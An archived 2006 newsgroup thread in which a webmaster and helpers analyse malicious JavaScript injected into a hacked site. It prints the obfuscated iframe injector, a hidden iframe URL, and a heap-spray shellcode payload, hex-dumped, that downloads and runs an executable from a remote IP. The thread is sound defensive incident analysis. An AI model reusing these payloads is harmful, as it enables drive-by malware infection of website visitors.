Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Computing > Computer Security > Malicious javascript obfustication

Reply
Thread Tools

Malicious javascript obfustication

 
 
Wong Yung
Guest
Posts: n/a
 
      10-23-2006
Hi

Recently the webserver my page is on was hacked. Someone put in some
malicious javascript which I believe redirects the browser to another
webpage. I want to go to the URL directly using something like links
on Linux or Safari on Mac (as I have a strong suspicion it's probably
exploitin some IE vulnerability or trying to download some Windows
trojan) to work out what exactly it was trying to do. However it looks
like the URL was obfusticated:

Quote:
s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${m hxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o=' ';for(i=0;i<92;i++){o+=String.fromCharCode(s.charC odeAt(i)-4);}document.write(o);
Is there any tool I can use to work out what the URL is from this?

Thanks!

 
Reply With Quote
 
 
 
 
Todd H.
Guest
Posts: n/a
 
      10-23-2006
"Wong Yung" <(E-Mail Removed)> writes:

> Hi
>
> Recently the webserver my page is on was hacked. Someone put in some
> malicious javascript which I believe redirects the browser to another
> webpage. I want to go to the URL directly using something like links
> on Linux or Safari on Mac (as I have a strong suspicion it's probably
> exploitin some IE vulnerability or trying to download some Windows
> trojan) to work out what exactly it was trying to do. However it looks
> like the URL was obfusticated:
>
>
Quote:
> s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${m hxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o=' ';for(i=0;i<92;i++){o+=String.fromCharCode(s.charC odeAt(i)-4);}document.write(o);
>
>
> Is there any tool I can use to work out what the URL is from this?


It's javascript so a web browser is all you need.

It's a rot 4 encoding if you will. It's just taking each of the
characters of that string s and subtracting 4 from it
i.e. s.charCodeAt(i)-4

By changing document.write(o) to an alert() call you can see what it
says.

It translates to

<iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">


And that page appears to redirect somewhere else.

<a
href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>



--
Todd H.
http://www.toddh.net/
 
Reply With Quote
 
 
 
 
Wong Yung
Guest
Posts: n/a
 
      10-23-2006

Todd H. wrote:
> "Wong Yung" <(E-Mail Removed)> writes:
>
> > Hi
> >
> > Recently the webserver my page is on was hacked. Someone put in some
> > malicious javascript which I believe redirects the browser to another
> > webpage. I want to go to the URL directly using something like links
> > on Linux or Safari on Mac (as I have a strong suspicion it's probably
> > exploitin some IE vulnerability or trying to download some Windows
> > trojan) to work out what exactly it was trying to do. However it looks
> > like the URL was obfusticated:
> >
> >
Quote:
> > s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${m hxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o=' ';for(i=0;i<92;i++){o+=String.fromCharCode(s.charC odeAt(i)-4);}document.write(o);
> >
> >
> > Is there any tool I can use to work out what the URL is from this?

>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/


Thanks very much Todd!

I went to the webpage and it's very strange. It doesn't seem to
attempt to download anything. They (kaonline.biz) claim that someone
is trying to blackmail them by sending spam in their name and then
trying to extort money from them. If this is true and they are not
lying their heads off I wonder if this is part of the supposed
extortion attempt. Or maybe they're just saying that because really
they are spammers and...*Sigh* I don't know what to believe anymore.

Still this is only what it is doing *now*. The webserver looks like it
has been hacked for a while now and god knows what's been happening in
the meantime.

Thanks though for helping out!

 
Reply With Quote
 
Todd H.
Guest
Posts: n/a
 
      10-23-2006
"Wong Yung" <(E-Mail Removed)> writes:

> Thanks very much Todd!
>
> I went to the webpage and it's very strange. It doesn't seem to
> attempt to download anything. They (kaonline.biz) claim that someone
> is trying to blackmail them by sending spam in their name and then
> trying to extort money from them. If this is true and they are not
> lying their heads off I wonder if this is part of the supposed
> extortion attempt. Or maybe they're just saying that because really
> they are spammers and...*Sigh* I don't know what to believe anymore.
>
> Still this is only what it is doing *now*. The webserver looks like it
> has been hacked for a while now and god knows what's been happening in
> the meantime.
>
> Thanks though for helping out!


No problem.

Was your webhost based on cpanel.net software? A few weeks ago, a
whole bunch of cpanel based sites got owned and were used largely to
spread the Internet Explorer 0day exploit dujour. I think that
issue has been patched but it did affect a lot of folks. Curious if
you were one of em.

Best Regards,
--
Todd H.
http://www.toddh.net/
 
Reply With Quote
 
Wong Yung
Guest
Posts: n/a
 
      10-23-2006

Todd H. wrote:
> "Wong Yung" <(E-Mail Removed)> writes:
>
> > Thanks very much Todd!
> >
> > I went to the webpage and it's very strange. It doesn't seem to
> > attempt to download anything. They (kaonline.biz) claim that someone
> > is trying to blackmail them by sending spam in their name and then
> > trying to extort money from them. If this is true and they are not
> > lying their heads off I wonder if this is part of the supposed
> > extortion attempt. Or maybe they're just saying that because really
> > they are spammers and...*Sigh* I don't know what to believe anymore.
> >
> > Still this is only what it is doing *now*. The webserver looks like it
> > has been hacked for a while now and god knows what's been happening in
> > the meantime.
> >
> > Thanks though for helping out!

>
> No problem.
>
> Was your webhost based on cpanel.net software? A few weeks ago, a
> whole bunch of cpanel based sites got owned and were used largely to
> spread the Internet Explorer 0day exploit dujour. I think that
> issue has been patched but it did affect a lot of folks. Curious if
> you were one of em.
>
> Best Regards,
> --
> Todd H.
> http://www.toddh.net/



No,

I think the webserver was running Apache on Linux (I say "I think"
because I wasn't admining it so I don't know what exactly was running
on the computer). The problem is it wasn't updated and so I guess in
the end you can say it was all our own fault.

*Sigh* I'm still worried though because even though it looks like the
hack is fairly harmless now it looks like it was hacked a while ago and
who knows if they hadn't taken the opportunity to download Trojans onto
a few computers first. You know how it is with security - once one
thing gets compromised everything touching it is tainted because you
can't be sure what the hackers were doing.

Usually I run either Linux (most of these redirect things lead to some
Windows specific malware) or Windows with Firefox with the NoScript
extension which blocks all javascript except on sites you whitelist.
However, I *did* test my website in IE several times when the script
was present so I could make sure the css looked OK. Nor did I turn off
scripting in IE because I hardly ever use it and I didn't think my own
website would be a security risk. Not sure what to do now...probably
run a full anti-virus and anti-spyware check but you know that doesn't
catch everything. On the bright side of things I don't remember any
anti-virus alerts, or probably more importantly any warnings about
something trying to replace program x with a different version (I have
a program which detects when program files get changed) when I was
looking at my site in IE...

Anyway, thanks a lot for your help. It did help relieve my mind a lot.

 
Reply With Quote
 
Wong Yung
Guest
Posts: n/a
 
      10-23-2006
Todd H. wrote:
> "Wong Yung" <(E-Mail Removed)> writes:
>
> > Hi
> >
> > Recently the webserver my page is on was hacked. Someone put in some
> > malicious javascript which I believe redirects the browser to another
> > webpage. I want to go to the URL directly using something like links
> > on Linux or Safari on Mac (as I have a strong suspicion it's probably
> > exploitin some IE vulnerability or trying to download some Windows
> > trojan) to work out what exactly it was trying to do. However it looks
> > like the URL was obfusticated:
> >
> >
Quote:
> > s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${m hxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o=' ';for(i=0;i<92;i++){o+=String.fromCharCode(s.charC odeAt(i)-4);}document.write(o);
> >
> >
> > Is there any tool I can use to work out what the URL is from this?

>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/



Actually looking more closely at it there seems to be something else
going on as well. If I use links, it does exactly as you say.
However, using Opera, Firefox or Konqueror what it does is goes to a
webpage with


<script>var
s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u 4141%u4141");
do{s+=s;}while(s.length<0x0900000);s+=unescape
("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0 320
%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2
%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B
%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B
%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40
%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u 8304
%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u 8BFF
%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%u BF5D
%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%u D0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%u FFFF
%u7468%u7074%u2F3A%u362F%u2E36%u3633%u322E%u3134%u 322E
%u3334%u642F%u652E%u6578");</script></head><body><embed
src="hacked3_files/-----------------------------------------------------------.html">

(I named the file hacked3.html)

The
"hacked3_files/-----------------------------------------------------------.html"
is a html file with:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /expd/----------- (the hypthens
continue forever)
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAA ANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYY ZZZZ0000111122223333444455556666777788889999.wmv
on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle
the request.
<HR>
<ADDRESS>Apache/1.3.37 Server at 66.36.241.243 Port 80</ADDRESS>
</BODY></HTML>

So it looks like on Konqueror/Firefox/Opera it was trying to download a
wmv file (which no longer exists on the server). On links however it
seems to go to an entirely different webpage, the one which as you
point out tries to go to http://kaonline.biz/.

 
Reply With Quote
 
Ant
Guest
Posts: n/a
 
      10-24-2006
"Wong Yung" wrote:

> Actually looking more closely at it there seems to be something else
> going on as well. If I use links, it does exactly as you say.
> However, using Opera, Firefox or Konqueror what it does is goes to a
> webpage with
>
> <script>var
> s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u 4141%u4141");
> do{s+=s;}while(s.length<0x0900000);s+=unescape
> ("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0 320

[snip]

That variable "s" is storing executable code. The script inserts at
least 9437184 "A" characters (a NOP sled of 0x41), followed by code
which looks like this when dumped out in hex/ascii:

0000 EB 54 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 .T.u<.t5x..V.v .
0010 F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 74 .3.IA.3.6...(8.t
0020 08 C1 CB 0D 03 DA 40 EB EF 3B DF 75 E7 5E 8B 5E ......@..;.u.^.^
0030 24 03 DD 66 8B 0C 4B 8B 5E 1C 03 DD 8B 04 8B 03 $..f..K.^.......
0040 C5 C3 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 43 3A 5C ..urlmon.dll.C:\
0050 55 2E 65 78 65 00 33 C0 64 03 40 30 78 0C 8B 40 U.exe.3.d.@0x..@
0060 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C ..p...@....@4.@|
0070 8B 40 3C 95 BF 8E 4E 0E EC E8 84 FF FF FF 83 EC .@<...N.........
0080 04 83 2C 24 3C FF D0 95 50 BF 36 1A 2F 70 E8 6F ..,$<...P.6./p.o
0090 FF FF FF 8B 54 24 FC 8D 52 BA 33 DB 53 53 52 EB ....T$..R.3.SSR.
00A0 24 53 FF D0 5D BF 98 FE 8A 0E E8 53 FF FF FF 83 $S..]......S....
00B0 EC 04 83 2C 24 62 FF D0 BF 7E D8 E2 73 E8 40 FF ...,$b...~..s.@.
00C0 FF FF 52 FF D0 E8 D7 FF FF FF 68 74 74 70 3A 2F ..R.......http:/
00D0 2F 36 36 2E 33 36 2E 32 34 31 2E 32 34 33 2F 64 /66.36.241.243/d
00E0 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 .exe............

I'm guessing it would use urlmon.dll to download the file "d.exe" from
66.36.241.243, which is a small executable packed using FSG. There's
also a reference to a file "C:\U.exe".

> The
> "hacked3_files/-----------------------------------------------------------.html"
> is a html file with:


[...]

> AAAABBBB [snip] NNNNOOOOAAA [snip] 88889999.wmv


The part between my snips had a control character (0x05) either side
of it. I don't know the reason for that.

[...]

> So it looks like on Konqueror/Firefox/Opera it was trying to download a
> wmv file (which no longer exists on the server). On links however it
> seems to go to an entirely different webpage, the one which as you
> point out tries to go to http://kaonline.biz/.


It appears to be an exploit involving a wmv vulnerability, but I don't
know how the binary code in the script variable "s" gets to be run.

Also spotted here:
http://www.castlecops.com/p842233-Po...V_exploit.html


 
Reply With Quote
 
Wong Yung
Guest
Posts: n/a
 
      10-24-2006

Ant wrote:
> "Wong Yung" wrote:


>
> > So it looks like on Konqueror/Firefox/Opera it was trying to download a
> > wmv file (which no longer exists on the server). On links however it
> > seems to go to an entirely different webpage, the one which as you
> > point out tries to go to http://kaonline.biz/.

>
> It appears to be an exploit involving a wmv vulnerability, but I don't
> know how the binary code in the script variable "s" gets to be run.
>
> Also spotted here:
> http://www.castlecops.com/p842233-Po...V_exploit.html



Wow. Thanks very much for the info. And thanks heaps for
unobfusticating the stuff in javascript. Hmmm...looking at the
castlecops link it looks like we aren't the only ones who were hacked
using the same thing. Do you have any idea why links goes to
kaonline.biz? I'm trying to work out what role they play in all of
this.

 
Reply With Quote
 
Ant
Guest
Posts: n/a
 
      10-25-2006
"Wong Yung" wrote:

> Wow. Thanks very much for the info. And thanks heaps for
> unobfusticating the stuff in javascript. Hmmm...looking at the
> castlecops link it looks like we aren't the only ones who were hacked
> using the same thing. Do you have any idea why links goes to
> kaonline.biz? I'm trying to work out what role they play in all of
> this.


I don't know if they are involved. They say they're being attacked,
so you could report it to them, but as far as I can tell there is no
exploit if the redirect is to kaonline.biz.

If I use wget on the "e7da7.in" link, I get redirected to kaonline.
However, if I use telnet, the redirection is to:
ht_p://66.36.241.243/expd/index.php
(I've munged the "http" in case anyone's click-happy)

That's where the malicious code is, and I found a different (and more
obfuscated) exploit to what you posted before.

Where you are redirected, and what exploit is served up probably
depends on the user-agent header of the http request.


 
Reply With Quote
 
Wong Yung
Guest
Posts: n/a
 
      10-27-2006

Ant wrote:
> "Wong Yung" wrote:
>
> > Wow. Thanks very much for the info. And thanks heaps for
> > unobfusticating the stuff in javascript. Hmmm...looking at the
> > castlecops link it looks like we aren't the only ones who were hacked
> > using the same thing. Do you have any idea why links goes to
> > kaonline.biz? I'm trying to work out what role they play in all of
> > this.

>
> I don't know if they are involved. They say they're being attacked,
> so you could report it to them, but as far as I can tell there is no
> exploit if the redirect is to kaonline.biz.
>
> If I use wget on the "e7da7.in" link, I get redirected to kaonline.
> However, if I use telnet, the redirection is to:
> ht_p://66.36.241.243/expd/index.php
> (I've munged the "http" in case anyone's click-happy)
>
> That's where the malicious code is, and I found a different (and more
> obfuscated) exploit to what you posted before.
>
> Where you are redirected, and what exploit is served up probably
> depends on the user-agent header of the http request.


*Sigh* I couldn't get a nice simple evil guy could I? BTW what is this
other more obfusticated exploit that you found?

 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Malicious JavaScript code, Noone Here Javascript 25 01-31-2006 01:50 AM
JavaScript and malicious code? Lew Computer Support 6 01-29-2006 04:54 AM
ActiveX apologetic Larry Seltzer... "Sun paid for malicious ActiveX code, and Firefox is bad, bad bad baad. please use ActiveX, it's secure and nice!" (ok, the last part is irony on my part) fernando.cassia@gmail.com Java 0 04-16-2005 10:05 PM
malicious javascript code Xah Lee Javascript 0 11-19-2004 10:08 AM
preventing malicious user input Stimp ASP .Net 1 09-15-2004 03:25 AM



Advertisments